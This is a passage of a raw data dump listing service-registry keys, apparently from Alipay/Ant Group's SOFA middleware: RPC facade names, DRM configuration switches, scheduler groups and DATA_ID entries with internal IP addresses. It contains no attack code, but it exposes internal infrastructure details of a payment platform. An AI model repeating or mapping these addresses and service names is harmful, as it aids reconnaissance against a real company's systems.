8.49.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.codemarket.minipcodemarket.facade.codemarket.TemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:autoinsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.api.content.qa.TopicQueryApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.changeriskmanage.common.service.facade.ChangeInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.InterfaceQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:fininflux#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zbdm.common.service.facade.biz.BizColumnInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.antvip.ServerlessPaasAntVipFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecodec.service.facade.CodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantStatisticsMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.209.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_INSPTMARKET#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.common.service.facade.order.OrderOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.OrderLinkService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.container.facade.api.KgOnlineServiceInvokeFacade:1.0:ainlp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:OPSNODE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.GiftUserStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.162.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.alipayBizVoucher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kabaoprod.biz.mwallet.manager.present.PresentManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.open.spi.FinnetSpiReceiveService:1.0:filecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.antqnamesrv:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscenepage.common.service.facade.api.PageVersionConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebWorkDayQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.95.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.88.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_PCIEP_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.middlewareSwitch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.instrument:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.OrganizationFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:faudiorec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.api.APIDbBaseFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_GIRISK#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpunish.common.service.facade.control.ControlEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.PromoSceneQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.urge.UrgeTicketQueryFacade:1.0:fcprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.TestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.225.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insassetprod.common.service.facade.MerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.riskmng.pmcShineDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.97.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.45.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.smartsql.service.facade.service.TaskServerV2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csrobot.service.facade.mng.api.ChatQuestionMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.cloudinc.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.146.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilelbs.common.service.facade.UserStepCounterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbatch.biz.service.test.OfflineTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaserver.facade.ZproxyCPvSofaService:1.0:zproxyCForM@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-PCINSTOPERATION-DAILY-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchportalcore.common.service.merchant.facade.api.SmallStoreAnnualBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingCenterSystemInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.ModuleSpecQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amldata.com.service.facade.api.corprisk.CompanyRiskLabelService:1.0:companyRiskLableService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassettrade.fintradespi.spi.FinTradeCheckSpi:1.0:finfundtrade-check-spi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cardbin.common.service.facade.CardBinClientFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:multimediabase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.48.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_BIYUAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbcontent.common.service.facade.api.menu.MenuManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserBizInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:couriercore#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.miniselfop.facade.api.miniunifydata.MiniDataSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.infosecTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fcrcportal:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.user.api.SecuUserCrsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:almspmo-familyworkstation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentfusion.myhome.service.facade.AppDataFacade:1.0:insassetprod_insassetprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.spi.SecurityProductService:1.0:bio@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkwirelessdataportal.common.service.codego.CodeGoCommentServerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.facade.PasswordVerifyService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mbillexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:opscloudcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.goldetf.api.GoldtransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bumng.common.ozawa.service.facade.ToDoItemService:1.0.0:pmcAuditToDoItemService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.MPcardRzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.assistinvestigate.require.facade.RequireManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.kwlib:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.omc.proto.DbMetaDatabaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundbankcore.common.service.facade.FundBankCustodyTransferOutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.IdentityCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zdal.ldc.tair.customerv2.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-mrchselfop-schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.contentlib.common.service.facade.account.LifeAppQueryGZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:airbops_TechnicalExamCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.EbppRetryChargeoffConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.community.api.friendships.FriendshipsManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.OracleDepositbackInstructionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.OpManagementService:1.0:instopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.z.did.facade.DataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditquery.common.api.PcreditLoanOrderLoadTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@nfcc#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.fcbuservice.common.service.facade.HufuFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_FUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbdatafactory.common.service.facade.realtime.RealtimeTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.core.drm.CoreOrderExecuteDRMResource.orderSerialPreCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.overseaprod.common.service.tax.TaxOrderService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mydds.core.engine.service.api.TableMetaService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.ctlibwhitelist.ContentLibManangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditamount.service.PcreditAmountBalanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.task.remote.handler.RemoteTaskHandler:1.0:mif-cache-preload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.SettlementAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.PermissionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkbudgetcore.facade.PlanBudgetControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zpaas.zappinfo.facade.query.ArchDomainQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openaccess.common.quickaccess.facade.service.proxy.ServiceProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.117.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.217.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-pickup@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinquotationprod.common.service.facade.api.QuotationCapitalFlowFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_LOADCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.linkede.metacenter.common.service.facade.StationCommonServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.16.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dmeta.facade.virtualcanvas.DmetaVirtualCanvasDomainWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zdatalab.common.service.facade.project.ProjectQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.rewardBudgetInsufficientWarningText,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.pdcore.common.service.clientcache.facade.ProdClientCacheQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.AccountCancelOperateFacade:1.0:fcvostroflux@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.loginauth.facade.MobileLoginAuthService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.operator.OperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmvisaprod.common.service.facade.api.VisaOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.comment.ReplyUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:publicDomain_finannafccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanpromo.service.extmerchant.ActivityCreditApplyRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.baas.common.user.service.ChainManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.question.questionreplace.QuestionReplaceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.GlobalConfuseConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.punish.SecurityPunishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:devserver-app#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.pdcore.common.service.facade.ProductManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ctu.service.analyze.facade.CtuAnalyzeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.slaguard:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInMatchAllRequest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.starWishInvestRemindDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.232.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ordermng.common.service.api.contract.ContractOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.switcher.riskmngTairCache.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icredittrans.service.facade.api.AccountManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_DEMO_SOFA4#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.166.154.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acnotifycore.common.service.facade.CategoryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundprod.common.service.facade.api.KatongBindCardService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.item.facade.SkuApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.gfcenter.common.service.facade.ArBillOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-wowtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_PUC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.162.167#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcloanprod.common.service.facade.service.credit.JieBeiPlusCreditAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appfusebase.sdk.facade.inner.Router:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.mybank.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.bizprodmng:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:investmentCheckService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.ps.rpc.facade.team.UserTeamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmonitor.common.service.facade.formula.FormulaDefFacadeService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.xb.XbInvestPreferenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.ForceRepayDrm.queryForceRepayRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fincommontaskhub.service.facade.service.spi.ExecuteService:1.0:finopencore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.alarmAtPersonalConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.user.api.SecuInstitutionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.BetaStrategyMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.camphome.facade.CampHomeConfigWorkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditdatacenter.executeServiceDispatcher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.facade.api.JiuzhouReleaseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.communityshare:name=com.alipay.mobilecommunity.biz.community.drm.CommunityShareCfgResource.autoOpenAuditMemLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.144.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.core.service.explorer.ExplorerManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.230.185#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tss.supportprod.facade.emergency.EmcPlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_AGDS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S_pcreditcoop_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cloud.opscore.common.service.facade.OpsFlowTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointRefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.sites.facade.service.ZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.prod.common.service.facade.api.comment.KbCommentQueryProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sync.ldcpubmemdb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.equitypublishcore.common.service.facade.publicoffering.CsrcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.promo.SalesService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.common.service.facade.api.job.SingleJobInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.biz.shared.flowIncentive.FlowOrderCreateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.165.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.234.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.drm7013#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fscagdsad@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linglongsdk.server.facade.SceneInstaller:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.lawsuit.LawsuitCaseInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.databus.UserLoanApplySyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.labellib.LabelLibService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.apshopcenter.ApscPromotionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.msgbroker.MessageProcessor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.trServerExecutorCorePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custview.antg.facade.archive.AntArchiveViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.tenant.CapTenantUserService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.contract.common.service.facade.api.ContractTemplateConfigOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitprod.common.service.mng.facade.CardInvokeMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.normalExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finauth.common.service.facade.file.service.FileTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fporgassetkeeper.facade.api.DistributeRuleFacade:1.0:fporgassetkeeper@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.pcinstprod.pcinstprod_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.morderprod:name=com.alipay.morderprod.switch.tempSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ldm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lego.common.service.facade.abnormalMotion.AbnormalMotionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.biz.promoworkbench.navigator.DefaultNavManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM"